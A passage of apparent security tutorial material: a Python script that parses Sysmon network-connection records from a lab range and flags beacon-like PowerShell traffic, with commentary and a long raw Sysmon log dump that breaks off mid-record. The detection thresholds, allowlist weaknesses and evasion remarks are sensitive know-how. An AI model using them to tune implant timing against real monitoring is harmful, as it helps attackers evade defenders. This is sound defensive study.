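    r"354300x800000000000000036496775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:36.436{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50456-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036496801Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:40.448{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50458-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036496800Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:39.779{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50457-false10.0.1.12-8000-",
    r"354300x800000000000000036496807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:45.458{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50459-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036496809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:45.794{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50460-false10.0.1.12-8000-",
    r"354300x800000000000000036496816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:51.471{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50461-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https",
    r"354300x800000000000000036496818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:51.823{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50462-false10.0.1.12-8000-",
]

# Assumed allowlist for this example: (lower-cased Image, lower-cased User).
KNOWN_AGENTS = {
    (r"c:\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe",
     r"nt authority\system"),
}

# System header: EventID, Version, Level (4), Task (= EventID), Opcode (0),
# Keywords 0x8000000000000000, EventRecordID, Channel, Computer, then the
# EventData RuleName ("-" on this host) and UtcTime.
HEADER = re.compile(
    r"(?P<eid>\d{1,2})(?P<ver>\d)4(?P=eid)00x80+(?P<rec>\d+)"
    r"Microsoft-Windows-Sysmon/Operational(?P<host>.+?)-"
    r"(?P<time>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+)"
)
# Event ID 3 body in schema order. IPv4 only: an IPv6 endpoint makes the match
# fail, so the record is skipped rather than mis-split.
NETCONN = re.compile(
    r"\{(?P<guid>[0-9A-Fa-f-]+)\}(?P<pid>\d+)(?P<image>.+?\.exe)(?P<user>.+?)"
    r"(?P<proto>tcp|udp)(?P<initiated>true|false)(?P<src_v6>true|false)"
    r"(?P<src_ip>\d{1,3}(?:\.\d{1,3}){3})(?P<src_host>.+?)(?P<src_port>\d{1,5})"
    r"(?P<src_pname>-|[a-z][a-z0-9-]*)(?P<dst_v6>true|false)"
    r"(?P<dst_ip>\d{1,3}(?:\.\d{1,3}){3})(?P<dst_host>.+?)(?P<dst_port>\d{1,5})"
    r"(?P<dst_pname>-|[a-z][a-z0-9-]*)$"
)


def split_events(blob):
    """Cut a run of concatenated events at each System header."""
    starts = [m.start() for m in HEADER.finditer(blob)]
    return [blob[a:b].strip() for a, b in zip(starts, starts[1:] + [len(blob)])]


def parse_event(text):
    """Return the fields of one Event ID 3 record, or None for any other event."""
    h = HEADER.match(text)
    if not h or h.group("eid") != "3":
        return None
    m = NETCONN.match(text, h.end())
    if not m:
        return None
    d = m.groupdict()
    return {
        "record": int(h.group("rec")), "host": h.group("host"),
        "time": datetime.strptime(h.group("time"), "%Y-%m-%d %H:%M:%S.%f"),
        "image": d["image"], "user": d["user"], "proto": d["proto"],
        "initiated": d["initiated"] == "true",
        "src": (d["src_ip"], int(d["src_port"])),
        "dst": (d["dst_ip"], int(d["dst_port"])), "dst_pname": d["dst_pname"],
    }


def analyse(records, min_intervals=3, max_cv=0.25):
    """Group outbound connections per (image, user, destination) and flag flows
    whose inter-connection gaps have a low coefficient of variation."""
    flows = defaultdict(list)
    for rec in records:
        e = parse_event(rec)
        if e and e["initiated"]:
            flows[(e["image"], e["user"], e["dst"])].append(e["time"])
    report = []
    for (image, user, dst), times in flows.items():
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if len(gaps) < min_intervals:
            continue  # too few connections to say anything about cadence
        mean = statistics.fmean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        report.append({
            "image": image, "user": user, "dst": dst, "connections": len(times),
            "mean_gap": mean, "cv": cv, "beacon_like": cv <= max_cv,
            "allowlisted": (image.lower(), user.lower()) in KNOWN_AGENTS,
        })
    return report


if __name__ == "__main__":
    for r in analyse(split_events(" ".join(RECORDS))):
        verdict = ("allowlisted agent" if r["allowlisted"]
                   else "BEACON-LIKE" if r["beacon_like"] else "irregular")
        name = ntpath.basename(r["image"])
        print(f"{name:<16} {r['user']:<26} -> {r['dst'][0]}:{r['dst'][1]}  "
              f"n={r['connections']} mean={r['mean_gap']:.3f}s cv={r['cv']:.2f}  {verdict}")
```

Run as-is, both flows come out beacon-like: the PowerShell connections to 10.0.1.16:443 arrive 4 to 6 seconds apart and the stream forwarder's connections to 10.0.1.12:8000 about 6 seconds apart, so periodicity alone cannot separate the user-context powershell.exe from the monitoring agent running as SYSTEM. The allowlist that makes the difference here is a path-plus-user pair, which is a weak discriminator because an attacker chooses both the binary name and where it lives; in production key the allowlist on the process's Hashes from its Event ID 1 record instead (this export carries those for the forwarder's helper processes), and tune `max_cv` against a baseline, since the sub-minute cadence here is test-range traffic and real implants sleep longer with jitter. Exporting Sysmon as XML or JSON in the first place removes the need for the regex recovery entirely.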
354300x800000000000000036496807Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:45.458{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50459-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496810Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:16.429{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C17E36E1334E76161991E6881D120C1A,SHA256=FDD632EC4E0AB4F83B662722BEC7CCE89CD0352CC268EE77894605A950FDA27D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496809Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:45.794{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50460-false10.0.1.12-8000- 23542300x800000000000000036496811Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:17.444{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E5518ABD356DDEDCCCDB9F922AD2425,SHA256=FFE6E3CC4DB2E50CAEBFBEE4B75684ACB45EA1A3A47CBF79DFE1CD56CD22E9A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496812Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:18.493{B81B27B7-4024-611D-7300-00000000C801}2188NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F07C66A0719F586456E036395308E718,SHA256=6051EA6245BB1DD36D2051C6DF96CD526F55CE4EF3C16FB506AB15102FA355A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496813Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:19.511{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CA2141F513B80ACA3C5DE04FA7BB2A8,SHA256=344E0D2E185D25A8C3858E104B6C0BD5E6932AF1E5CDDD17B6CCA522BF15F4BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496815Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:20.910{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7F57AA8B2FFB09C61B38D38E4E531337,SHA256=55F884A129BFD4FDC0EE056681D1E3CD63DAC224A6EAF39CCBAEDC67E92A8960,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496814Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:20.526{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=332C2158F23EA115BD450B48C8E5C5F7,SHA256=5FFB37010A07BD66693D62718E0CAF0523BD863A0B1ACE5C9A1ECFFF531431F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496817Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:21.540{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=068084D593D4B390F5DE07CF155D5E02,SHA256=138D3485A9910BD2D831A1BA13392E6D8F5FA9C9F9C6F1BB51074A8BDB217CFB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496816Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:51.471{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50461-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036496819Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:22.589{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28546E9FCE10A13279ED8C6A03E0A26B,SHA256=231B81CA82BD1B4ABD331920EABF0AF9DACA3B0735A0495663C43D967C88F1CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036496818Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:51.823{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50462-false10.0.1.12-8000- 23542300x800000000000000036496821Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:23.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85D7970AD0F47A08ACB51712A11A7CAC,SHA256=912A33631D49697EFD98F945956A993F94BBA1182F0002743BE0EC17033DBDDB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496820Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:23.224{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=76BCF1D8CBE48381C381EC66D4F8564C,SHA256=CFBAC7333099511617852B19045704ED6DA526920125C7A964DD272DA2BD3E4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036496839Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.923{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E7B589855F230766DAF88FDC2AB8B798,SHA256=9347623EAA61C261A486D63EB96EEB4F521812B6A6153B3BADE19C8447592A07,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496838Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:24.870{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A030-6140-6A56-04000000C801}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496837Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.870{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496836Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:24.870{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496835Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.870{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496834Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:24.870{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496833Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.870{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A030-6140-6A56-04000000C801}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036496832Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.870{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A030-6140-6A56-04000000C801}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036496831Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.855{B81B27B7-A030-6140-6A56-04000000C801}5776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036496830Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6590D32878C17F4E2BB5A03043372F1C,SHA256=780463CBF3FF79836EBC6F32C5D62A8ADFAB5AE1216B86E7E9C50A9FD41762CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036496829Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:24.170{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A030-6140-6956-04000000C801}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496828Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.170{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496827Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:24.170{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496826Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.170{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496825Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:14:24.170{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036496824Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:14:24.170{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A030-6140-6956-04000000C801}4916C:\Program 